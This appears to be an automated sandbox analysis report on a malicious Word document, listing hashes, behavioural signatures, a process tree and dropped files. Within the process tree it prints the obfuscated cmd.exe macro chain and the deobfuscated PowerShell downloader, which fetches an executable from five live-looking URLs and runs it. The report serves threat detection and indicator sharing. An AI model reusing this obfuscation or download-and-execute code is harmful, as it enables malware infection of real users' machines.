Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-09-2024 03:09

General

  • Target

    eef66e503617b6ae990bd1a90be931f0_JaffaCakes118.doc

  • Size

    198KB

  • MD5

    eef66e503617b6ae990bd1a90be931f0

  • SHA1

    89949a05d7b250a87d5e885d62ccfd934f8f00b6

  • SHA256

    e5066650466c3c3e97b614d8c6631a12f554cbfea3e2a8647153b4c1faa5177f

  • SHA512

    b0bf2f278c729885a5c843a99dc2d4b8a86cf21aa5aaf88841a0a8d2dc4cebadfba16d76178615c16765b80c985f01051fa95d5f35dac519b693f40bf47047ec

  • SSDEEP

    3072:bzEWdGujL/xSu90OoiLuDKZXfwKeljR1z:vSUxUOmD+XfwLX

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://kantova.com/DWTr10bVVLjs5r

exe.dropper

http://www.hjsanders.nl/889KycAhSPlXPbrS

exe.dropper

http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW

exe.dropper

http://bozziro.ir/YENtfKb77bgd_Gk

exe.dropper

http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eef66e503617b6ae990bd1a90be931f0_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4728
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set Insd=_;ZCPw=Wl{0AhB93pVU.k1%$v7'6MJO2\yTm+(tLe,x-s@IYKfE5NuS~ci j8FrDzQ:o4Hgab/G)dXn}&&for %l in (16;67;5;22;4;18;13;39;46;3;66;55;51;41;21;22;62;22;54;50;54;54;46;30;52;52;11;28;50;66;55;43;68;41;21;22;12;22;34;50;28;4;66;55;43;15;41;21;22;8;8;58;23;12;14;31;25;31;6;26;53;25;60;21;51;26;1;23;56;25;27;31;6;78;40;5;43;67;72;59;40;56;38;58;52;40;38;19;7;40;72;3;8;57;40;78;38;1;23;53;21;51;31;60;6;26;12;38;38;16;66;73;73;20;71;78;38;67;24;71;19;56;67;35;73;63;7;34;62;21;10;72;17;17;39;59;44;51;62;45;12;38;38;16;66;73;73;5;5;5;19;12;59;44;71;78;76;40;62;44;19;78;8;73;60;60;14;48;33;56;11;12;54;4;8;77;4;72;62;54;45;12;38;38;16;66;73;73;71;8;38;67;24;71;12;40;71;8;38;12;56;71;62;40;19;56;67;35;73;5;16;43;56;67;78;38;40;78;38;73;53;16;8;67;71;76;44;73;71;50;10;27;71;71;74;54;17;67;46;0;69;61;7;45;12;38;38;16;66;73;73;72;67;64;64;57;62;67;19;57;62;73;47;50;52;38;49;48;72;25;25;72;70;76;0;74;20;45;12;38;38;16;66;73;73;12;40;57;64;53;78;70;44;78;67;38;76;57;40;78;44;38;43;44;67;49;67;62;38;19;71;38;73;29;38;72;57;34;56;33;53;11;74;3;21;2;13;65;26;19;54;16;8;57;38;37;26;45;26;75;1;23;12;51;25;31;68;6;26;67;21;68;25;10;26;1;23;12;15;21;25;51;58;6;58;26;21;21;31;26;1;23;38;60;21;25;51;6;26;35;68;51;68;21;26;1;23;62;14;60;68;21;6;23;40;78;24;66;38;40;35;16;36;26;32;26;36;23;12;15;21;25;51;36;26;19;40;42;40;26;1;49;67;62;40;71;56;12;37;23;16;31;25;68;68;58;57;78;58;23;53;21;51;31;60;75;9;38;62;33;9;23;56;25;27;31;19;63;67;5;78;8;67;71;76;61;57;8;40;37;23;16;31;25;68;68;41;58;23;62;14;60;68;21;75;1;23;64;25;14;51;27;6;26;35;68;51;27;51;26;1;46;49;58;37;37;74;40;38;43;46;38;40;35;58;23;62;14;60;68;21;75;19;8;40;78;70;38;12;58;43;70;40;58;68;10;10;10;10;75;58;9;46;78;24;67;20;40;43;46;38;40;35;58;23;62;14;60;68;21;1;23;57;14;51;60;10;6;26;56;25;51;10;21;26;1;72;62;40;71;20;1;79;79;56;71;38;56;12;9;79;79;23;8;25;14;60;27;6;26;57;14;21;25;26;1;88)do set EU7r=!EU7r!!Insd:~%l,1!&&if %l gtr 87 echo !EU7r:~-606!|%LOCALAPPDATA:~-3,-2%m%TMP:~-15,-14% "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2472
      • C:\Windows\system32\cmd.exe
        CmD /V:O/C"set Insd=_;ZCPw=Wl{0AhB93pVU.k1%$v7'6MJO2\yTm+(tLe,x-s@IYKfE5NuS~ci j8FrDzQ:o4Hgab/G)dXn}&&for %l in (16;67;5;22;4;18;13;39;46;3;66;55;51;41;21;22;62;22;54;50;54;54;46;30;52;52;11;28;50;66;55;43;68;41;21;22;12;22;34;50;28;4;66;55;43;15;41;21;22;8;8;58;23;12;14;31;25;31;6;26;53;25;60;21;51;26;1;23;56;25;27;31;6;78;40;5;43;67;72;59;40;56;38;58;52;40;38;19;7;40;72;3;8;57;40;78;38;1;23;53;21;51;31;60;6;26;12;38;38;16;66;73;73;20;71;78;38;67;24;71;19;56;67;35;73;63;7;34;62;21;10;72;17;17;39;59;44;51;62;45;12;38;38;16;66;73;73;5;5;5;19;12;59;44;71;78;76;40;62;44;19;78;8;73;60;60;14;48;33;56;11;12;54;4;8;77;4;72;62;54;45;12;38;38;16;66;73;73;71;8;38;67;24;71;12;40;71;8;38;12;56;71;62;40;19;56;67;35;73;5;16;43;56;67;78;38;40;78;38;73;53;16;8;67;71;76;44;73;71;50;10;27;71;71;74;54;17;67;46;0;69;61;7;45;12;38;38;16;66;73;73;72;67;64;64;57;62;67;19;57;62;73;47;50;52;38;49;48;72;25;25;72;70;76;0;74;20;45;12;38;38;16;66;73;73;12;40;57;64;53;78;70;44;78;67;38;76;57;40;78;44;38;43;44;67;49;67;62;38;19;71;38;73;29;38;72;57;34;56;33;53;11;74;3;21;2;13;65;26;19;54;16;8;57;38;37;26;45;26;75;1;23;12;51;25;31;68;6;26;67;21;68;25;10;26;1;23;12;15;21;25;51;58;6;58;26;21;21;31;26;1;23;38;60;21;25;51;6;26;35;68;51;68;21;26;1;23;62;14;60;68;21;6;23;40;78;24;66;38;40;35;16;36;26;32;26;36;23;12;15;21;25;51;36;26;19;40;42;40;26;1;49;67;62;40;71;56;12;37;23;16;31;25;68;68;58;57;78;58;23;53;21;51;31;60;75;9;38;62;33;9;23;56;25;27;31;19;63;67;5;78;8;67;71;76;61;57;8;40;37;23;16;31;25;68;68;41;58;23;62;14;60;68;21;75;1;23;64;25;14;51;27;6;26;35;68;51;27;51;26;1;46;49;58;37;37;74;40;38;43;46;38;40;35;58;23;62;14;60;68;21;75;19;8;40;78;70;38;12;58;43;70;40;58;68;10;10;10;10;75;58;9;46;78;24;67;20;40;43;46;38;40;35;58;23;62;14;60;68;21;1;23;57;14;51;60;10;6;26;56;25;51;10;21;26;1;72;62;40;71;20;1;79;79;56;71;38;56;12;9;79;79;23;8;25;14;60;27;6;26;57;14;21;25;26;1;88)do set EU7r=!EU7r!!Insd:~%l,1!&&if %l gtr 87 echo !EU7r:~-606!|cmD "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4888
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $h9272='u7815';$c762=new-object Net.WebClient;$u1528='http://kantova.com/DWTr10bVVLjs5r@http://www.hjsanders.nl/889KycAhSPlXPbrS@http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW@http://bozziro.ir/YENtfKb77bgd_Gk@http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ'.Split('@');$h5724='o1470';$h3175 = '112';$t8175='m4541';$r9841=$env:temp+'\'+$h3175+'.exe';foreach($p2744 in $u1528){try{$c762.DownloadFile($p2744, $r9841);$z7956='m4565';If ((Get-Item $r9841).length -ge 40000) {Invoke-Item $r9841;$i9580='c7501';break;}}catch{}}$l7986='i917';"
          4⤵
            PID:1372
          • C:\Windows\system32\cmd.exe
            cmD
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4744
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $h9272='u7815';$c762=new-object Net.WebClient;$u1528='http://kantova.com/DWTr10bVVLjs5r@http://www.hjsanders.nl/889KycAhSPlXPbrS@http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW@http://bozziro.ir/YENtfKb77bgd_Gk@http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ'.Split('@');$h5724='o1470';$h3175 = '112';$t8175='m4541';$r9841=$env:temp+'\'+$h3175+'.exe';foreach($p2744 in $u1528){try{$c762.DownloadFile($p2744, $r9841);$z7956='m4565';If ((Get-Item $r9841).length -ge 40000) {Invoke-Item $r9841;$i9580='c7501';break;}}catch{}}$l7986='i917';
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4460

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\TCDBE75.tmp\iso690.xsl

      Filesize

      263KB

      MD5

      ff0e07eff1333cdf9fc2523d323dd654

      SHA1

      77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

      SHA256

      3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

      SHA512

      b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lpf5qcp5.gvm.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

      Filesize

      16B

      MD5

      d29962abc88624befc0135579ae485ec

      SHA1

      e40a6458296ec6a2427bcb280572d023a9862b31

      SHA256

      a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

      SHA512

      4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

      Filesize

      1KB

      MD5

      2653ce99351670047c6ffd1cc57b0989

      SHA1

      9c8c764a2e83ef11f6775a24f4c49dad956de433

      SHA256

      c17a99d2edfe17b3aadd9b10b2cd1e7378641b44ce2e00b2f9467a3a13006509

      SHA512

      7e634977808ca75acf6f767e7f3b81b451d0349f45e8cb578e2b53ca5f1ef75dbec13be3666caab5c8a1259a3c672a772d30cf20776a5ef7da77f3bb0cf07d6e

    • memory/4460-73-0x0000018C39790000-0x0000018C397B2000-memory.dmp

      Filesize

      136KB

    • memory/4728-16-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-41-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-13-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-12-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-14-0x00007FFF49C30000-0x00007FFF49C40000-memory.dmp

      Filesize

      64KB

    • memory/4728-11-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-8-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-7-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-6-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-5-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

      Filesize

      64KB

    • memory/4728-15-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-18-0x00007FFF49C30000-0x00007FFF49C40000-memory.dmp

      Filesize

      64KB

    • memory/4728-17-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-20-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-19-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-0-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

      Filesize

      64KB

    • memory/4728-28-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-9-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-50-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-2-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

      Filesize

      64KB

    • memory/4728-67-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-3-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

      Filesize

      64KB

    • memory/4728-10-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-78-0x00007FFF8BD4D000-0x00007FFF8BD4E000-memory.dmp

      Filesize

      4KB

    • memory/4728-79-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-80-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-81-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-4-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

      Filesize

      64KB

    • memory/4728-90-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-91-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB

    • memory/4728-1-0x00007FFF8BD4D000-0x00007FFF8BD4E000-memory.dmp

      Filesize

      4KB

    • memory/4728-593-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

      Filesize

      64KB

    • memory/4728-594-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

      Filesize

      64KB

    • memory/4728-596-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

      Filesize

      64KB

    • memory/4728-595-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

      Filesize

      64KB

    • memory/4728-597-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

      Filesize

      2.0MB